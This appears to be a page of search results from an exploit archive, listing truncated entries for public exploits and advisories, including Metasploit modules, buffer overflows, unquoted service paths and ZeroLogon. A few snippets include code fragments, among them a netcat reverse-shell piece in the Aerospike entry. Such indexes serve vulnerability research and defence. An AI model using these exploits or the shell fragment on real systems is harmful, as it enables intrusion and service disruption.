39001 matches found
SciKit-Learn 0.23.2 Denial Of Service Vulnerability
SciKit-Learn 0.23.2 Denial Of Service Description svmpredictvalues in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service segmentation fault via a crafted model SVM introduced via pickle, json, or any other model permanence...
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path Vulnerability
Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path Discovery by: Jok3r Vendor Homepage: https://home.pearsonvue.com/ Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENUTCInstallGuide/DownloadVTSInstaller.htm Tested Version: 2.3.1911...
YATinyWinFTP - Denial of Service Exploit
Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10 ------------------------------Description---------------------------------...
Apache NiFi API Remote Code Execution Exploit
This Metasploit module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must be unsecured or credentials provided and the ExecuteProcess processor must be available. An ExecuteProcessor processor is created then is configured with the payload and...
Foxit Reader 9.0.1.1049 - Arbitrary Code Execution Exploit
Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution Exploit Author: CrossWire Vendor Homepage: https://www.foxitsoftware.com/ Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&packagetype=exe&language=English...
libupnp 1.6.18 - Stack-based buffer overflow Exploit
Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow DoS Date: 2020-08-20 Exploit Author: Patrik Lantz Vendor Homepage: https://pupnp.sourceforge.io/ Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download Version: = 1.6.6 Tested on:...
SAP Lumira 1.31 - Stored Cross-Site Scripting Vulnerability
Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting Exploit Author: Ilca Lucian Florin Vendor Homepage: https://www.sap.com Software Link: SAP Lumira Version: 123 •...
Adobe Flash Player MediaPlayer Out-Of-Bounds Access Remote Code Execution Exploit
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of...
Pure-FTPd 1.0.48 - Remote Denial of Service Exploit
Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service Date: 2020. nov. 26., 09:32:17 CET Exploit Author: xynmaps Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ Software Link: https://github.com/jedisct1/pure-ftpd/ Version: 1.0.48 Tested on: Parrot Security OS 5.9.0 encoding=utf...
Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Exploit
Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Exploit Author: Loke Hui Yi Vendor Homepage: https://razerid.razer.com Software Link: http://rzr.to/synapse-3-pc-download Version: , and create an exe file with the same application's name in that folder. The Ap...
Wondershare Driver Install Service help 10.7.1.321 - (ElevationService) Unquote Service Path Vulnera
Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path Exploit Author: Luis Sandoval Vendor Homepage: https://www.wondershare.com/ Software Link: https://www.wondershare.com/drfone/ Version: 10.7.1.321 Tested on: Windows 10 Home Single Language...
WordPress Simple File List Unauthenticated Remote Code Execution Exploit
This Metasploit module exploits WordPress Simple File List plugin versions prior to 4.2.3, which allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrar...
OpenMediaVault rpc.php Authenticated PHP Code Injection Exploit
This Metasploit module exploits an authenticated PHP code injection vulnerability found in openmediavault versions before 4.1.36 and 5.x versions before 5.5.12 inclusive in the "sortfield" POST parameter of the rpc.php page, because "jsonencodesafe" is not used in config/databasebackend.inc...
Kong Gateway Admin API Remote Code Execution Exploit
This Metasploit module uses the Kong admin API to create a route and a serverless function plugin that is associated with the route. The plugin runs Lua code and is used to run a system command using os.execute. After execution the route is deleted, which also deletes the plugin...
docPrint Pro 8.0 - (Add URL) Buffer Overflow (SEH Egghunter) Exploit
Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow SEH Egghunter Exploit Author: MasterVlad Vendor Homepage: http://www.verypdf.com Software Link: http://dl.verypdf.net/docprintprosetup.exe Version: 8.0 Vulnerability Type: Local Buffer Overflow Tested on: Windows 7 32-bit Proof of Concep...
Apache OpenMeetings 5.0.0 - (hostname) Denial of Service Vulnerability
Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service Google Dork: "Apache OpenMeetings DOS" Exploit Author: SunCSR ThienNV - Sun Cyber Security Research Vendor Homepage: https://openmeetings.apache.org/ Software Link: https://openmeetings.apache.org/ Version: 4.0.0 - 5.0.0 Test...
ZeroShell 3.9.0 - (cgi-bin/kerbynet) Remote Root Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Zeroshell 3.9.0 Remote Command Execution', 'Description' = %q This module exploits an unauthenticated command injection vulnerability found in...
Barco wePresent WiPG-1600W Insecure Firmware Image Vulnerability
Barco wePresent WiPG-1600W versions 2.5.1.8, 2.5.0.25, 2.5.0.24, and 2.4.1.19 have firmware that does not perform verification of digitally signed firmware updates and is susceptible to processing and installing modified/malicious images. Title: Barco wePresent Insecure Firmware Image Publication...
Barco wePresent WiPG-1600W Admin Credential Exposure Vulnerability
An attacker armed with hardcoded API credentials from KL-001-2020-004 CVE-2020-28329 can issue an authenticated query to display the admin password for the main web user interface listening on port 443/tcp for Barco wePresent WiPG-1600W version 2.5.1.8. Title: Barco wePresent Admin Credentials...
Barco wePresent WiPG-1600W Hardcoded API Credentials Vulnerability
Barco wePresent device firmware includes a hardcoded API account and password that is discoverable by inspecting the firmware image. A malicious actor could use this password to access authenticated, administrative functions in the API. Versions affected include 2.5.1.8, 2.5.0.25, 2.5.0.24, and...
Barco wePresent WiPG-1600W Authentication Bypass Vulnerability
The Barco wePresent WiPG-1600W version 2.5.1.8 web interface does not use session cookies for tracking authenticated sessions. Instead, the web interface uses a "SEID" token that is appended to the end of URLs in GET requests. Thus the "SEID" would be exposed in web proxy logs and browser history...
Barco wePresent WiPG-1600W Global Hardcoded Root SSH Password Vulnerability
Barco wePresent WiPG-1600W versions 2.5.1.8, 2.5.0.25, 2.5.0.24, and 2.4.1.19 have a hardcoded root password hash included in the firmware image. Title: Barco wePresent Global Hardcoded Root SSH Password Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-008.txt 1...
Barco wePresent WiPG-1600W Undocumented SSH Interface Vulnerability
Barco wePresent WiPG-1600W version 2.5.1.8 has an SSH daemon included in the firmware image. By default, the SSH daemon is disabled and does not start at system boot. The system initialization scripts read a device configuration file variable to see if the SSH daemon should be started. The web...
Boxoft Audio Converter 2.3.0 - (.wav) Buffer Overflow (SEH) Exploit
Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow SEH Discovery by: Luis Martinez Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe Tested Version: 2.3.0 Vulnerability Type: Local Buffer Overflow SEH Tested on OS: Windows...
Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution Exploit
This Metasploit module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project...
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Free MP3 CD Ripper 2.6 %q This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8. By constructing a specially crafted...
Boxoft Convert Master 1.3.0 - (wav) SEH Local Exploit
Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/convert-master/setupboxoft-conver=t-master.exe Exploit Author: Achilles Tested Version: 1.3.0 Tested on: Windows 7 x64 1.- Run python code...
Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH) Exploit
Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution SEH Exploit Author: Vincent Wolterman Vendor Homepage: https://www.zortam.com/index.html Software Link: https://www.zortam.com/download.html Version: 27.60 Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Profession...
IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - Buffer Overflow Exploit
Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow Exploit Author: Paolo Stagno aka VoidSec Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG77.1.0/com.ibm.itsm.tsm.doc/welcome.html Version: 5.2.0.1...
Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow Exploit
Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow PoC Exploit Author: Vincent Wolterman Vendor Homepage: http://www.internetdownloadmanager.com/ Software Link: http://www.internetdownloadmanager.com/download.html Version: 6.38.12 Tested on: Windows 7...
Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Exploit
Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Exploit Author: Nitesh Surana Vendor Homepage: https://www.gxgroup.eu/ont-products/ Version: P4410-V2-1.34H Tested on: Windows/Kali CVE : CVE-2020-25988 import upnpy upnp = upnpy.UPnP Discover UPnP devices on the network...
Oracle WebLogic Server Administration Console Handle Remote Code Execution Exploit
This Metasploit module exploits a path traversal and a Java class instantiation in the handle implementation of WebLogic's Administration Console to execute code as the WebLogic user. Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 are known to be affected. Tested against...
ZeroLogon - Netlogon Elevation of Privilege Exploit
Exploit Title: ZeroLogon - Netlogon Elevation of Privilege Date: 2020-10-04 Exploit Author: West Shepherd Vendor Homepage: https://www.microsoft.com Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 Tested on: Microsof...
Microsoft Internet Explorer 11 - Use-After-Free Exploit
Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free Exploit Author: maxpl0it Vendor Homepage: https://www.microsoft.com/ Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx Version: IE 8, 9, 10, and 11 Tested on: Windows 7 x64 CVE : CVE-2020-0674 //...
Apache Struts 2.5.20 - Double OGNL evaluation Exploit
Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation Exploit Author: West Shepherd Vendor Homepage: https://struts.apache.org/download.cgi Version: Struts 2.0.0 - Struts 2.5.20 S2-059 CVE : CVE-2019-0230 Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github...
LCD_Service 1.0.1.0 - (LCD_Service) Unquote Service Path Vulnerability
Exploit Title: Huawei LCDService 1.0.1.0 - 'LCDService' Unquote Service Path Exploit Author: Gerardo González Vendor Homepage: https://consumer.huawei.com/mx Software Link: https://consumer.huawei.com/mx Version: 1.0.1.0 Tested on: Windows 10 Home Single Language x64 Esp Step to discover the...
Aerospike Database 5.1.0.3 - OS Command Execution Exploit
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect except Exception a...
Atheros Coex Service Application 8.0.0.255 - (ZAtheros Bt&Wlan Coex Agent) Unquoted Service Path
Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path Exploit Author : Isabel Lopez Vendor Homepage : https://www.file.net/process/athcoexagent.exe.html Link Software : https://www.boostbyreason.com/resource-file-9102-athcoexagent-exe.aspx...
Advanced System Care Service 13 - (AdvancedSystemCareService13) Unquoted Service Path Vulnerability
Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path Author: Jair Amezcua Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/es/advancedsystemcarepro.php Version : 13.0.0.157 Tested on: Windows 10 64bitEN CVE : N/A 1. Description:...
AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation Exploit
/AIX 5.3L /usr/sbin/lquerypv local root privilege escalation =========================================================== AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based overflow in the handling of -V command line argument. However, prior to the vulnerability being...
Cisco 7937G - DoS/Privilege Escalation Exploit
Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation Exploit Author: Cody Martin Vendor Homepage: https://cisco.com Version: =SIP-1-4-5-7 Tested On: SIP-1-4-5-5, SIP-1-4-5-7 !/usr/bin/python import sys import getopt import requests import paramiko import socket import os def mainargv:...
KiteService 1.2020.1113.1 - (KiteService.exe) Unquoted Service Path Vulnerability
Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path Discovery by: IRVIN GIL Vendor Homepage: https://www.kite.com/ Tested Version: 1.2020.1113.1 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 x64 es Step to discover Unquoted Service Path: C:\wmic...
Logitech Solar Keyboard Service - (L4301_Solar) Unquoted Service Path Vulnerability
Title: Logitech Solar Keyboard Service - 'L4301Solar' Unquoted Service Path Author: Jair Amezcua Vendor Homepage: https://www.logitech.com/es-mx Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750 Version : 1.10.3.0 Tested on: Windows 10...
ASUS TM-AC1900 Arbitrary Command Execution Exploit
This Metasploit module exploits a code execution vulnerability within the ASUS TM-AC1900 router as an authenticated user. The vulnerability is due to a failure filter out percent encoded newline characters within the HTTP argument SystemCmd when invoking /apply.cgi which bypasses the patch for...
Bludit Panel Brute Forcer Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Bludit Panel Brute force', 'Description' = %q This Module performs brute force attack on Bludit Panel. , 'Author' = 'Eren Simsek ', 'License' =...
HorizontCMS 1.0.0-beta Shell Upload Exploit
This Metasploit module exploits an arbitrary file upload vulnerability in HorizontCMS 1.0.0-beta in order to execute arbitrary commands. The module first attempts to authenticate to HorizontCMS. It then tries to upload a malicious PHP file via an HTTP POST request to /admin/file-manager/fileuploa...
Citrix ADC NetScaler Local File Inclusion Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC NetScaler - Local File Inclusion Metasploit', 'Description' = % The remote device is affected by multiple vulnerabilities. An...
ReadyTalk Avian JVM FileOutputStream.write() Integer Overflow Exploit
ReadyTalk Avian JVM versions 1.2.0 before 27th October 2020 suffer from a FileOutputStream.write integer overflow vulnerability. Vulnerability title: Avian JVM FileOutputStream.write Integer Overflow Author: Pietro Oliva Vendor: ReadyTalk Product: Avian JVM Affected version: 1.2.0 before 27th...
DigitalPersona 5.1.0.656 (DpHostW) - Unquoted Service Path Vulnerability
Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path Discovery by: Teresa Q Vendor:DigitalPersona U. are U. One Touch Version: 5.1.0.656 Vulnerability Type: Unquoted Service Path Vendor Homepage : https://www.hidglobal.com/crossmatch Tested on OS: Windows 10 Home x64 es Analy...
IDT PC Audio 1.0.6425.0 - (STacSV) Unquoted Service Path Vulnerability
Exploit Title: IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path Discovery by: Isabel Lopez Software link: https://www.pconlife.com/download/otherfile/20566/098185e9b7c417cf7480bb9f839db652/ Discovery Date: 2020-11-07 Tested Version: 1.0.6425.0 Vulnerability Type: Unquoted Service Path...